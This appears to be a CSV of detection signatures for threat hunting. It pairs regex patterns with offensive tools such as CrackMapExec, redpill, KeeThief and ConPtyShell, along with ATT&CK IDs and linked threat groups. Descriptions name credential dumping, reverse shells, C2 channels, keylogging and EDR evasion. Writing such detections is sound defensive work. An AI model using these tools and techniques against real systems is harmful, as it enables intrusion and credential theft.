"*$DummyServiceName*",".{0,1000}\$DummyServiceName.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks  ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3956"
"*$dumpDir\lsass.txt*",".{0,1000}\$dumpDir\\lsass\.txt.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","3957"
"*$DumpLsass=*",".{0,1000}\$DumpLsass\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3958"
"*$EmptyPasswordUsers*",".{0,1000}\$EmptyPasswordUsers.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","3960"
"*$EncodedCommandExfil*",".{0,1000}\$EncodedCommandExfil.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3961"
"*$env:COMPlus_ETWEnabled=0*",".{0,1000}\$env\:COMPlus_ETWEnabled\=0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","3962"
"*$env:TEMP\winkeykey.txt*",".{0,1000}\$env\:TEMP\\winkeykey\.txt.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3964"
"*$Env:TMP\Camera.ps1*",".{0,1000}\$Env\:TMP\\Camera\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3965"
"*$Env:TMP\GetLogs.ps1*",".{0,1000}\$Env\:TMP\\GetLogs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3966"
"*$env:TMP\Leaked.txt*",".{0,1000}\$env\:TMP\\Leaked\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3967"
"*$Env:TMP\Screenshot.ps1*",".{0,1000}\$Env\:TMP\\Screenshot\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3968"
"*$Env:TMP\StartWebServer.ps1*",".{0,1000}\$Env\:TMP\\StartWebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3969"
"*$Env:TMP\Start-WebServer.ps1*",".{0,1000}\$Env\:TMP\\Start\-WebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3970"
"*$Env:TMP\tdfr.log*",".{0,1000}\$Env\:TMP\\tdfr\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3971"
"*$Env:TMP\Upload.ps1*",".{0,1000}\$Env\:TMP\\Upload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3972"
"*$Env:TMP\webserver.ps1.ps1*",".{0,1000}\$Env\:TMP\\webserver\.ps1\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3973"
"*$fct = Get-Content -Encoding byte -Path *",".{0,1000}\$fct\s\=\sGet\-Content\s\-Encoding\sbyte\s\-Path\s.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","#content","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","3974"
"*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*",".{0,1000}\$FilterArgs\s\=\s\@\{\sname\=\'Notion\'.{0,1000}EventNameSpace\=\'root\\\\CimV2\'.{0,1000}QueryLanguage\=.{0,1000}WQL.{0,1000}\sQuery\=.{0,1000}SELECT\s.{0,1000}\sFROM\s__InstanceModificationE.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","3975"
"*$ForensikeFolder*",".{0,1000}\$ForensikeFolder.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","3976"
"*$FQDNDomainPlusAccountOperators*",".{0,1000}\$FQDNDomainPlusAccountOperators.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3977"
"*$FQDNDomainPlusDomainAdmins*",".{0,1000}\$FQDNDomainPlusDomainAdmins.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3978"
"*$FQDNDomainPlusEnterpriseAdmins*",".{0,1000}\$FQDNDomainPlusEnterpriseAdmins.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3979"
"*$FQDNDomainPlusServerOperators*",".{0,1000}\$FQDNDomainPlusServerOperators.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3980"
"*$Green Infecting html file*",".{0,1000}\$Green\sInfecting\shtml\sfile.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #content","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","3981"
"*$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp*",".{0,1000}\$Hc2\$w\$c\$rQW\$d\$s\$w\$b\$Hc2\$v\$xZp\$f\$w\$V9z\$rQW\$L\$U\$xZp.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","3982"
"*$HidePayload*",".{0,1000}\$HidePayload.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","3983"
"*$HOME/.tunneler*",".{0,1000}\$HOME\/\.tunneler.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","3984"
"*$InsecureResourceDelegations*",".{0,1000}\$InsecureResourceDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","3986"
"*$InsecureTrusteeDelegations*",".{0,1000}\$InsecureTrusteeDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","3987"
"*$IPPrintC2*",".{0,1000}\$IPPrintC2.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3988"
"*$IPPrintC2.DocumentName*",".{0,1000}\$IPPrintC2\.DocumentName.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3989"
"*$IPPrintC2.Print*",".{0,1000}\$IPPrintC2\.Print.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3990"
"*$KeePassBinaryPath*",".{0,1000}\$KeePassBinaryPath.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks  ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3991"
"*$KeePassUser*",".{0,1000}\$KeePassUser.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks  ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3992"
"*$KeePassXMLPath backdoored*",".{0,1000}\$KeePassXMLPath\sbackdoored.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","3993"
"*$KeePassXMLPath triggers removed*",".{0,1000}\$KeePassXMLPath\striggers\sremoved.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","3994"
"*$Kerberoast*",".{0,1000}\$Kerberoast.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","3995"
"*$Keylogger=*",".{0,1000}\$Keylogger\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3996"
"*$LolDriversVulnerable*",".{0,1000}\$LolDriversVulnerable.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","3997"
"*$MimiTickets*",".{0,1000}\$MimiTickets.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3999"
"*$myC2ipAdress*",".{0,1000}\$myC2ipAdress.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","4000"
"*$myVictimIPAdress*",".{0,1000}\$myVictimIPAdress.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","4001"
"*$N0q$x$Hc2$rQW*",".{0,1000}\$N0q\$x\$Hc2\$rQW.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4002"
"*$newClass[""__CLASS""] = ""PMEClass""*",".{0,1000}\$newClass\[\""__CLASS\""\]\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","4003"
"*$parametersConPtyShell*",".{0,1000}\$parametersConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","simple backdoor with anydesk","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","4005"
"*$PipeName = ""TestSVC""*",".{0,1000}\$PipeName\s\=\s\""TestSVC\"".{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#namedpipe","simple backdoor with anydesk","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","4006"
"*$PotentialComputersWithEmptyPassword*",".{0,1000}\$PotentialComputersWithEmptyPassword.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","simple backdoor with anydesk","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","4007"
"*$PotentialUsersWithEmptyPassword*",".{0,1000}\$PotentialUsersWithEmptyPassword.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","simple backdoor with anydesk","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","4008"
